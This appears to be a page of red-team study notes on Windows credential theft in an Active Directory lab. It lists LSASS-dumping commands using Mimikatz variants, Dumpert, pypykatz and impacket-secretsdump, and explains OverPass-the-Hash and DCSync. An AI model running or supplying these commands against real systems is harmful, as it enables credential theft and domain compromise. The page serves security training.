Invoke-Mimikatz

circle-info

First thing we need to do when compromising a machine is dump credentials and tickets

triangle-exclamation

Dumping Creds From the LSASS

Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 
SafetyKatz.exe "sekurlsa::ekeys" 
SharpKatz.exe --Command ekeys
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
pypykatz.exe live lsa
impacket-secretsdump Admin:[email protected]

OverPass-The-Hash

circle-check
triangle-exclamation

Over Pass the hash (OPTH) generates tokens from hashes or keys. Needs elevation.

The following start a PowerShell session with a logon type 9 (same as runas /netonly).

This means when you access local resources on the machine it'll still show as your original user (example whoami = student1). However when you access resources on other domain machines it will use the credentials in OPTH ticket.

Don't need elevation to just get the ticket

This needs elevation because you're spawning a new process.

DCSync

Extracts credentials from the DC without code execution on it

Domain Admin / Special permissions are required.

Last updated